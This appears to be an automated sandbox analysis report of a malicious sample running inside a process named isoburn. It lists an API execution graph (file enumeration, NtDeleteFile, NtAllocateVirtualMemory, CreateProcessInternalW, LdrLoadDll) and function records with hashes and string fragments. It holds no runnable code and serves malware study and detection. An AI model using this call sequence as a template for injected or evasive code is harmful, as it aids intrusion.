                                                              execution_graph 92842 2edc4e0 92844 2edc509 92842->92844 92843 2edc60d 92844->92843 92845 2edc5b3 FindFirstFileW 92844->92845 92845->92843 92848 2edc5ce 92845->92848 92846 2edc5f4 FindNextFileW 92847 2edc606 FindClose 92846->92847 92846->92848 92847->92843 92848->92846 92849 2ee90a0 92850 2ee915a 92849->92850 92852 2ee90d2 92849->92852 92851 2ee9170 NtCreateFile 92850->92851 92853 2ee1a20 92858 2ee1a39 92853->92858 92854 2ee1ac9 92855 2ee1a84 92861 2eeb480 92855->92861 92858->92854 92858->92855 92859 2ee1ac4 92858->92859 92860 2eeb480 RtlFreeHeap 92859->92860 92860->92854 92864 2ee9720 92861->92864 92863 2ee1a94 92865 2ee973a 92864->92865 92866 2ee974b RtlFreeHeap 92865->92866 92866->92863 92869 2ed9aff 92870 2ed9b0f 92869->92870 92871 2eeb480 RtlFreeHeap 92870->92871 92872 2ed9b16 92870->92872 92871->92872 92873 2ed0d3b PostThreadMessageW 92874 2ed0d4d 92873->92874 92875 2ec9e36 92876 2ec9e0c 92875->92876 92879 2ec9e39 92875->92879 92877 2ec9e30 92876->92877 92878 2ec9e1d CreateThread 92876->92878 92880 2eca592 92879->92880 92882 2eeb0e0 92879->92882 92883 2eeb106 92882->92883 92888 2ec4020 92883->92888 92885 2eeb112 92886 2eeb14b 92885->92886 92891 2ee5500 92885->92891 92886->92880 92895 2ed3120 92888->92895 92890 2ec402d 92890->92885 92892 2ee5562 92891->92892 92894 2ee556f 92892->92894 92913 2ed1910 92892->92913 92894->92886 92896 2ed313d 92895->92896 92898 2ed3156 92896->92898 92899 2ee9e10 92896->92899 92898->92890 92900 2ee9e2a 92899->92900 92901 2ee9e59 92900->92901 92906 2ee8a00 92900->92906 92901->92898 92904 2eeb480 RtlFreeHeap 92905 2ee9ed2 92904->92905 92905->92898 92907 2ee8a1d 92906->92907 92910 4ee2c0a 92907->92910 92908 2ee8a49 92908->92904 92911 4ee2c1f LdrInitializeThunk 92910->92911 92912 4ee2c11 92910->92912 92911->92908 92912->92908 92914 2ed194b 92913->92914 92929 2ed7d70 92914->92929 92916 2ed1953 92917 2ed1c1d 92916->92917 92940 2eeb560 92916->92940 92917->92894 92919 2ed1969 92920 2eeb560 RtlAllocateHeap 92919->92920 92921 2ed197a 92920->92921 92922 2eeb560 RtlAllocateHeap 92921->92922 92923 2ed1988 92922->92923 92926 2ed1a1f 92923->92926 92951 2ed6920 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 92923->92951 92943 2ed4460 92926->92943 92927 2ed1bd2 92947 2ee7e40 92927->92947 92930 2ed7d9c 92929->92930 92952 2ed7c60 92930->92952 92933 2ed7dc9 92938 2ed7dd4 92933->92938 92958 2ee93a0 92933->92958 92934 2ed7de1 92936 2ee93a0 NtClose 92934->92936 92937 2ed7dfd 92934->92937 92939 2ed7df3 92936->92939 92937->92916 92938->92916 92939->92916 92966 2ee96d0 92940->92966 92942 2eeb57b 92942->92919 92944 2ed4484 92943->92944 92945 2ed448b 92944->92945 92946 2ed44c0 LdrLoadDll 92944->92946 92945->92927 92946->92945 92948 2ee7ea2 92947->92948 92950 2ee7eaf 92948->92950 92969 2ed1c30 92948->92969 92950->92917 92951->92926 92953 2ed7d56 92952->92953 92954 2ed7c7a 92952->92954 92953->92933 92953->92934 92961 2ee8aa0 92954->92961 92957 2ee93a0 NtClose 92957->92953 92959 2ee93ba 92958->92959 92960 2ee93cb NtClose 92959->92960 92960->92938 92962 2ee8abd 92961->92962 92965 4ee35c0 LdrInitializeThunk 92962->92965 92963 2ed7d4a 92963->92957 92965->92963 92967 2ee96ea 92966->92967 92968 2ee96fb RtlAllocateHeap 92967->92968 92968->92942 92972 2ed1c50 92969->92972 92985 2ed8040 92969->92985 92971 2ed21a6 92971->92950 92972->92971 92989 2ee1060 92972->92989 92975 2ed1e64 92997 2eec650 92975->92997 92976 2ed1cae 92976->92971 92992 2eec520 92976->92992 92979 2ed1e79 92981 2ed1ec9 92979->92981 93003 2ed0760 92979->93003 92981->92971 92982 2ed0760 LdrInitializeThunk 92981->92982 93007 2ed7fe0 92981->93007 92982->92981 92983 2ed2023 92983->92981 92984 2ed7fe0 LdrInitializeThunk 92983->92984 92984->92983 92986 2ed804d 92985->92986 92987 2ed806e SetErrorMode 92986->92987 92988 2ed8075 92986->92988 92987->92988 92988->92972 93011 2eeb3f0 92989->93011 92991 2ee1081 92991->92976 92993 2eec536 92992->92993 92994 2eec530 92992->92994 92995 2eeb560 RtlAllocateHeap 92993->92995 92994->92975 92996 2eec55c 92995->92996 92996->92975 92998 2eec5c0 92997->92998 92999 2eeb560 RtlAllocateHeap 92998->92999 93001 2eec61d 92998->93001 93000 2eec5fa 92999->93000 93002 2eeb480 RtlFreeHeap 93000->93002 93001->92979 93002->93001 93004 2ed077c 93003->93004 93018 2ee9640 93004->93018 93008 2ed7ff3 93007->93008 93023 2ee8900 93008->93023 93010 2ed801e 93010->92981 93014 2ee9510 93011->93014 93013 2eeb421 93013->92991 93015 2ee95a8 93014->93015 93017 2ee953e 93014->93017 93016 2ee95be NtAllocateVirtualMemory 93015->93016 93016->93013 93017->93013 93019 2ee965a 93018->93019 93022 4ee2c70 LdrInitializeThunk 93019->93022 93020 2ed0782 93020->92983 93022->93020 93024 2ee8981 93023->93024 93026 2ee892e 93023->93026 93028 4ee2dd0 LdrInitializeThunk 93024->93028 93025 2ee89a6 93025->93010 93026->93010 93028->93025 93029 2ed5ab0 93030 2ed7fe0 LdrInitializeThunk 93029->93030 93031 2ed5ae0 93029->93031 93030->93031 93033 2ed5b0c 93031->93033 93034 2ed7f60 93031->93034 93035 2ed7fa4 93034->93035 93036 2ed7fc5 93035->93036 93041 2ee86d0 93035->93041 93036->93031 93038 2ed7fb5 93039 2ed7fd1 93038->93039 93040 2ee93a0 NtClose 93038->93040 93039->93031 93040->93036 93042 2ee8750 93041->93042 93044 2ee86fe 93041->93044 93046 4ee4650 LdrInitializeThunk 93042->93046 93043 2ee8775 93043->93038 93044->93038 93046->93043 93047 2ed7030 93048 2ed7049 93047->93048 93056 2ed709c 93047->93056 93050 2ee93a0 NtClose 93048->93050 93048->93056 93049 2ed71d4 93051 2ed7064 93050->93051 93057 2ed6450 NtClose LdrInitializeThunk LdrInitializeThunk 93051->93057 93053 2ed71ae 93053->93049 93059 2ed6620 NtClose LdrInitializeThunk LdrInitializeThunk 93053->93059 93056->93049 93058 2ed6450 NtClose LdrInitializeThunk LdrInitializeThunk 93056->93058 93057->93056 93058->93053 93059->93049 93060 2edf730 93061 2edf794 93060->93061 93089 2ed61c0 93061->93089 93063 2edf8ce 93064 2edf8c7 93064->93063 93096 2ed62d0 93064->93096 93066 2edfa73 93067 2edf94a 93067->93066 93068 2edfa82 93067->93068 93100 2edf510 93067->93100 93069 2ee93a0 NtClose 93068->93069 93071 2edfa8c 93069->93071 93072 2edf986 93072->93068 93073 2edf991 93072->93073 93074 2eeb560 RtlAllocateHeap 93073->93074 93075 2edf9ba 93074->93075 93076 2edf9d9 93075->93076 93077 2edf9c3 93075->93077 93109 2edf400 93076->93109 93079 2ee93a0 NtClose 93077->93079 93080 2edf9cd 93079->93080 93081 2edf9e7 93113 2ee8e60 93081->93113 93083 2edfa62 93084 2ee93a0 NtClose 93083->93084 93085 2edfa6c 93084->93085 93086 2eeb480 RtlFreeHeap 93085->93086 93086->93066 93087 2edfa05 93087->93083 93088 2ee8e60 LdrInitializeThunk 93087->93088 93088->93087 93090 2ed61f3 93089->93090 93091 2ed6217 93090->93091 93117 2ee8f00 93090->93117 93091->93064 93093 2ed623a 93093->93091 93094 2ee93a0 NtClose 93093->93094 93095 2ed62ba 93094->93095 93095->93064 93097 2ed62f5 93096->93097 93122 2ee8d10 93097->93122 93101 2edf52c 93100->93101 93102 2ed4460 LdrLoadDll 93101->93102 93104 2edf54a 93102->93104 93103 2edf553 93103->93072 93104->93103 93105 2ed4460 LdrLoadDll 93104->93105 93106 2edf61e 93105->93106 93107 2ed4460 LdrLoadDll 93106->93107 93108 2edf678 93106->93108 93107->93108 93108->93072 93110 2edf412 CoInitialize 93109->93110 93112 2edf465 93110->93112 93111 2edf4fb CoUninitialize 93111->93081 93112->93111 93114 2ee8e7a 93113->93114 93127 4ee2ba0 LdrInitializeThunk 93114->93127 93115 2ee8eaa 93115->93087 93118 2ee8f1d 93117->93118 93121 4ee2ca0 LdrInitializeThunk 93118->93121 93119 2ee8f49 93119->93093 93121->93119 93123 2ee8d2a 93122->93123 93126 4ee2c60 LdrInitializeThunk 93123->93126 93124 2ed6369 93124->93067 93126->93124 93127->93115 93128 2ee0030 93129 2ee0053 93128->93129 93130 2ed4460 LdrLoadDll 93129->93130 93131 2ee0077 93130->93131 93132 2ee8830 93133 2ee88c2 93132->93133 93135 2ee885e 93132->93135 93137 4ee2ee0 LdrInitializeThunk 93133->93137 93134 2ee88f3 93137->93134 93144 2ee89b0 93145 2ee89cd 93144->93145 93148 4ee2df0 LdrInitializeThunk 93145->93148 93146 2ee89f5 93148->93146 93149 2ee5f70 93150 2ee5fca 93149->93150 93152 2ee5fd7 93150->93152 93153 2ee3980 93150->93153 93154 2eeb3f0 NtAllocateVirtualMemory 93153->93154 93156 2ee39be 93154->93156 93155 2ee3ace 93155->93152 93156->93155 93157 2ed4460 LdrLoadDll 93156->93157 93159 2ee3a04 93157->93159 93158 2ee3a50 Sleep 93158->93159 93159->93155 93159->93158 93160 2ed7289 93161 2ed7232 93160->93161 93162 2ed728e 93160->93162 93163 2ed727f 93161->93163 93165 2edb170 93161->93165 93162->93162 93166 2edb196 93165->93166 93167 2edb3c6 93166->93167 93192 2ee97b0 93166->93192 93167->93163 93169 2edb20c 93169->93167 93170 2eec650 2 API calls 93169->93170 93172 2edb22b 93170->93172 93171 2edb2ff 93175 2ed5a30 LdrInitializeThunk 93171->93175 93176 2edb31e 93171->93176 93172->93167 93172->93171 93173 2ee8a00 LdrInitializeThunk 93172->93173 93174 2edb28a 93173->93174 93174->93171 93179 2edb293 93174->93179 93175->93176 93180 2edb3ae 93176->93180 93198 2ee8570 93176->93198 93177 2edb2e7 93181 2ed7fe0 LdrInitializeThunk 93177->93181 93178 2edb2c5 93213 2ee4690 LdrInitializeThunk 93178->93213 93179->93167 93179->93177 93179->93178 93195 2ed5a30 93179->93195 93182 2ed7fe0 LdrInitializeThunk 93180->93182 93186 2edb2f5 93181->93186 93187 2edb3bc 93182->93187 93186->93163 93187->93163 93188 2edb385 93203 2ee8620 93188->93203 93190 2edb39f 93208 2ee8780 93190->93208 93193 2ee97cd 93192->93193 93194 2ee97de CreateProcessInternalW 93193->93194 93194->93169 93197 2ed5a6e 93195->93197 93214 2ee8bd0 93195->93214 93197->93178 93199 2ee85f0 93198->93199 93200 2ee859e 93198->93200 93220 4ee39b0 LdrInitializeThunk 93199->93220 93200->93188 93201 2ee8615 93201->93188 93204 2ee86a0 93203->93204 93206 2ee864e 93203->93206 93221 4ee4340 LdrInitializeThunk 93204->93221 93205 2ee86c5 93205->93190 93206->93190 93209 2ee87fd 93208->93209 93210 2ee87ab 93208->93210 93222 4ee2fb0 LdrInitializeThunk 93209->93222 93210->93180 93211 2ee8822 93211->93180 93213->93177 93215 2ee8c02 93214->93215 93216 2ee8c84 93214->93216 93215->93197 93219 4ee2d10 LdrInitializeThunk 93216->93219 93217 2ee8cc9 93217->93197 93219->93217 93220->93201 93221->93205 93222->93211 93223 2ed2688 93224 2ed269f 93223->93224 93225 2ed61c0 2 API calls 93224->93225 93226 2ed26b3 93225->93226 93227 2ed8704 93229 2ed8714 93227->93229 93228 2ed86c1 93229->93228 93231 2ed6fb0 93229->93231 93232 2ed6fc6 93231->93232 93234 2ed6fff 93231->93234 93232->93234 93235 2ed6e20 LdrLoadDll 93232->93235 93234->93228 93235->93234 93236 2ecb400 93237 2eeb3f0 NtAllocateVirtualMemory 93236->93237 93238 2ecca71 93237->93238 93239 2edac40 93244 2eda950 93239->93244 93241 2edac4d 93258 2eda5c0 93241->93258 93243 2edac69 93245 2eda975 93244->93245 93269 2ed8250 93245->93269 93248 2edaac0 93248->93241 93250 2edaad7 93250->93241 93251 2edaace 93251->93250 93253 2edabc5 93251->93253 93288 2eda010 93251->93288 93255 2edac2a 93253->93255 93297 2eda380 93253->93297 93256 2eeb480 RtlFreeHeap 93255->93256 93257 2edac31 93256->93257 93257->93241 93259 2eda5d6 93258->93259 93262 2eda5e1 93258->93262 93260 2eeb560 RtlAllocateHeap 93259->93260 93260->93262 93261 2eda608 93261->93243 93262->93261 93263 2ed8250 GetFileAttributesW 93262->93263 93264 2eda922 93262->93264 93267 2eda010 RtlFreeHeap 93262->93267 93268 2eda380 RtlFreeHeap 93262->93268 93263->93262 93265 2eda93b 93264->93265 93266 2eeb480 RtlFreeHeap 93264->93266 93265->93243 93266->93265 93267->93262 93268->93262 93270 2ed8271 93269->93270 93271 2ed8278 GetFileAttributesW 93270->93271 93272 2ed8283 93270->93272 93271->93272 93272->93248 93273 2ee3270 93272->93273 93274 2ee327e 93273->93274 93275 2ee3285 93273->93275 93274->93251 93276 2ed4460 LdrLoadDll 93275->93276 93277 2ee32ba 93276->93277 93278 2ee32c9 93277->93278 93301 2ee2d30 LdrLoadDll 93277->93301 93280 2eeb560 RtlAllocateHeap 93278->93280 93284 2ee3474 93278->93284 93281 2ee32e2 93280->93281 93282 2ee346a 93281->93282 93281->93284 93285 2ee32fe 93281->93285 93283 2eeb480 RtlFreeHeap 93282->93283 93282->93284 93283->93284 93284->93251 93285->93284 93286 2eeb480 RtlFreeHeap 93285->93286 93287 2ee345e 93286->93287 93287->93251 93289 2eda036 93288->93289 93302 2edda50 93289->93302 93291 2eda0a8 93293 2eda230 93291->93293 93294 2eda0c6 93291->93294 93292 2eda215 93292->93251 93293->93292 93295 2ed9ed0 RtlFreeHeap 93293->93295 93294->93292 93307 2ed9ed0 93294->93307 93295->93293 93298 2eda3a6 93297->93298 93299 2edda50 RtlFreeHeap 93298->93299 93300 2eda42d 93299->93300 93300->93253 93301->93278 93304 2edda74 93302->93304 93303 2edda81 93303->93291 93304->93303 93305 2eeb480 RtlFreeHeap 93304->93305 93306 2eddac4 93305->93306 93306->93291 93308 2ed9eed 93307->93308 93311 2eddae0 93308->93311 93310 2ed9ff3 93310->93294 93312 2eddb04 93311->93312 93313 2eddbae 93312->93313 93314 2eeb480 RtlFreeHeap 93312->93314 93313->93310 93314->93313 93315 2ed21c0 93316 2ee8a00 LdrInitializeThunk 93315->93316 93317 2ed21f6 93316->93317 93320 2ee9440 93317->93320 93319 2ed220b 93321 2ee94cf 93320->93321 93322 2ee946b 93320->93322 93325 4ee2e80 LdrInitializeThunk 93321->93325 93322->93319 93323 2ee9500 93323->93319 93325->93323 93331 2eec580 93332 2eeb480 RtlFreeHeap 93331->93332 93333 2eec595 93332->93333 93334 2ee9300 93335 2ee9377 93334->93335 93337 2ee932b 93334->93337 93336 2ee938d NtDeleteFile 93335->93336 93338 2ed2242 93339 2ed2202 93338->93339 93341 2ed220b 93338->93341 93340 2ee9440 LdrInitializeThunk 93339->93340 93340->93341 93342 2ed6c90 93343 2ed6cba 93342->93343 93346 2ed7e10 93343->93346 93345 2ed6ce1 93347 2ed7e2d 93346->93347 93353 2ee8af0 93347->93353 93349 2ed7e7d 93350 2ed7e84 93349->93350 93351 2ee8bd0 LdrInitializeThunk 93349->93351 93350->93345 93352 2ed7ead 93351->93352 93352->93345 93354 2ee8b8b 93353->93354 93356 2ee8b1b 93353->93356 93358 4ee2f30 LdrInitializeThunk 93354->93358 93355 2ee8bc4 93355->93349 93356->93349 93358->93355 93364 4ee2ad0 LdrInitializeThunk 93365 2ee1690 93366 2ee16ac 93365->93366 93367 2ee16e8 93366->93367 93368 2ee16d4 93366->93368 93369 2ee93a0 NtClose 93367->93369 93370 2ee93a0 NtClose 93368->93370 93371 2ee16f1 93369->93371 93372 2ee16dd 93370->93372 93375 2eeb5a0 RtlAllocateHeap 93371->93375 93374 2ee16fc 93375->93374 93376 2ee9210 93377 2ee92b7 93376->93377 93379 2ee923b 93376->93379 93378 2ee92cd NtReadFile 93377->93378 93380 2ed3013 93381 2ed7c60 2 API calls 93380->93381 93382 2ed3023 93381->93382 93383 2ed303f 93382->93383 93384 2ee93a0 NtClose 93382->93384 93384->93383

                                                              Executed Functions

                                                              Function 02EC9E40 Relevance: 26.6, Strings: 21, Instructions: 384COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 118 2ec9e40-2eca152 119 2eca15c-2eca163 118->119 120 2eca19e 119->120 121 2eca165-2eca19c 119->121 122 2eca1a5-2eca1af 120->122 121->119 123 2eca1e7-2eca1f0 122->123 124 2eca1b1-2eca1cb 122->124 127 2eca206-2eca210 123->127 128 2eca1f2-2eca204 123->128 125 2eca1cd-2eca1d1 124->125 126 2eca1d2-2eca1d4 124->126 125->126 129 2eca1e5 126->129 130 2eca1d6-2eca1df 126->130 131 2eca221-2eca22d 127->131 128->123 129->122 130->129 132 2eca23d-2eca241 131->132 133 2eca22f-2eca23b 131->133 134 2eca25c-2eca274 132->134 135 2eca243-2eca25a 132->135 133->131 137 2eca285-2eca291 134->137 135->132 138 2eca2a8-2eca2b2 137->138 139 2eca293-2eca2a6 137->139 140 2eca2c3-2eca2cf 138->140 139->137 142 2eca2e5-2eca2ee 140->142 143 2eca2d1-2eca2e3 140->143 144 2eca2f4-2eca2f7 142->144 145 2eca510-2eca517 142->145 143->140 149 2eca2fd-2eca304 144->149 147 2eca519-2eca548 145->147 148 2eca54a-2eca551 145->148 147->145 150 2eca5c3-2eca5cd 148->150 151 2eca553-2eca55d 148->151 152 2eca32b-2eca335 149->152 153 2eca306-2eca329 149->153 156 2eca5de-2eca5e7 150->156 154 2eca56e-2eca57a 151->154 155 2eca346-2eca352 152->155 153->149 157 2eca57c-2eca58b 154->157 158 2eca58d call 2eeb0e0 154->158 159 2eca354-2eca363 155->159 160 2eca365-2eca36c 155->160 161 2eca5fe-2eca607 156->161 162 2eca5e9-2eca5fc 156->162 163 2eca55f-2eca568 157->163 170 2eca592-2eca59e 158->170 159->155 165 2eca36e-2eca391 160->165 166 2eca393-2eca39d 160->166 162->156 163->154 165->160 169 2eca3ae-2eca3ba 166->169 171 2eca3bc-2eca3c9 169->171 172 2eca3cb-2eca3da 169->172 170->150 173 2eca5a0-2eca5c1 170->173 171->169 174 2eca3dc-2eca3e3 172->174 175 2eca40d-2eca417 172->175 173->170 177 2eca408 174->177 178 2eca3e5-2eca3fb 174->178 179 2eca428-2eca434 175->179 177->145 180 2eca3fd-2eca403 178->180 181 2eca406 178->181 182 2eca44a-2eca454 179->182 183 2eca436-2eca448 179->183 180->181 181->174 184 2eca465-2eca471 182->184 183->179 186 2eca493-2eca499 184->186 187 2eca473-2eca480 184->187 190 2eca49d-2eca4a4 186->190 188 2eca491 187->188 189 2eca482-2eca48b 187->189 188->184 189->188 192 2eca4c9-2eca4d3 190->192 193 2eca4a6-2eca4bc 190->193 196 2eca4e4-2eca4ed 192->196 194 2eca4be-2eca4c4 193->194 195 2eca4c7 193->195 194->195 195->190 197 2eca4ef-2eca4fb 196->197 198 2eca50b 196->198 199 2eca4fd-2eca503 197->199 200 2eca509 197->200 198->142 199->200 200->196
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ")$#$#$$u$'$-$-~$.$@k$H$O($T$Z/$[5$]5$f?$pa$r$vj$}$K
                                                              • API String ID: 0-3922967351
                                                              • Opcode ID: 73832e51bfc9b3fe20cb48dd9e477bf800181da4e6b786dc55891aadf2aed111
                                                              • Instruction ID: 738ea509829091368670a1bf34b5002db5108c96590e30635502fd3b7c8659c7
                                                              • Opcode Fuzzy Hash: 73832e51bfc9b3fe20cb48dd9e477bf800181da4e6b786dc55891aadf2aed111
                                                              • Instruction Fuzzy Hash: 7A228DB0D45229CBEB28CF85C994BDDBBB2BB44308F2091E9D50D6B385C7B55A89CF50
                                                              Function 02EDC4E0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 02EDC5C4
                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 02EDC5FF
                                                              • FindClose.KERNELBASE(?), ref: 02EDC60A
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 3541575487-0
                                                              • Opcode ID: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                              • Instruction ID: c281b53a43d0c0b2607b77abbd5ae06680549bd2b407bd447bd49139f59703b9
                                                              • Opcode Fuzzy Hash: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                              • Instruction Fuzzy Hash: E231C575940308BBDB20DBA0CC85FFF737DAB44749F10A149F909A6180DB70AA85CFA0
                                                              Function 02EE90A0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtCreateFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?,?,?), ref: 02EE91A1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                              • Instruction ID: ec242f57769d417438f55989fc50530000c32b9c9824fe6d8e7a9d2e500e302a
                                                              • Opcode Fuzzy Hash: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                              • Instruction Fuzzy Hash: 1F31E1B5A01609ABDB54DF98D880EEEB7F9AF88300F108619F919A7341D730A941CFA4
                                                              Function 02EE9210 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtReadFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?), ref: 02EE92F6
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                              • Instruction ID: 94146a30bfab0559892fb2fb84c0fce39289f7c58d825972f33c15196ee59b6b
                                                              • Opcode Fuzzy Hash: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                              • Instruction Fuzzy Hash: C431D4B5A00609ABDB14DF98D880EEFB7F9AF88714F108219F919A7345D770A911CFA4
                                                              Function 02EE9510 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(02ED1CAE,9ACB2CF8,02EE7EAF,00000000,00000004,00003000,?,?,?,?,?,02EE7EAF,02ED1CAE), ref: 02EE95DB
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                              • Instruction ID: 529458946acafaeba52bcbd4463d3d4149123af6eb59fcfebef681eddfc626bb
                                                              • Opcode Fuzzy Hash: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                              • Instruction Fuzzy Hash: 442128B5A40209ABDB10DF98D840EEFB7B9EF88300F10861DF919A7341D770A911CBA5
                                                              Function 02EE9300 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteFile
                                                              • String ID:
                                                              • API String ID: 4033686569-0
                                                              • Opcode ID: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                              • Instruction ID: f53aca14a3735c5d1fd5b226499be5ea1224cde358082462c922cf6589a940cc
                                                              • Opcode Fuzzy Hash: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                              • Instruction Fuzzy Hash: A211E371641605AEDB20EB64DC41FEFB3ADEF85704F20821DF91967281DB71B905CBA1
                                                              Function 02EE93A0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02EE93D4
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                              • Instruction ID: 9aeb1dee30de71f685b600471e528426b24513b67d2a48f3514e349ba47c7835
                                                              • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                              • Instruction Fuzzy Hash: 1DE086362402047BD620EB69DC41FD7776DDFC5710F118119FA0D67242C671B9118BF0
                                                              Function 04EE4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c1af3a122a4e840caf9f9e4a72a8c403ff71dfc214b552711077f6deba083890
                                                              • Instruction ID: d2717e924a656cf6f774a074156bb1983d1a01f39a468178e96301c24c977962
                                                              • Opcode Fuzzy Hash: c1af3a122a4e840caf9f9e4a72a8c403ff71dfc214b552711077f6deba083890
                                                              • Instruction Fuzzy Hash: F590027160190042658071584C054066005EBE2305395D115A1955560C8718D9659269
                                                              Function 04EE4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: da42d19946f494966a96bb3036e774b02349905a8423c19d17b3762e77064050
                                                              • Instruction ID: e09be03eb68ae614d3323abb70e81984e7166a412107e6a69bceefefe42f88e7
                                                              • Opcode Fuzzy Hash: da42d19946f494966a96bb3036e774b02349905a8423c19d17b3762e77064050
                                                              • Instruction Fuzzy Hash: 5B900231605C0012B58071584C855464005EBE1305B55D011E1825554C8B14DA665361
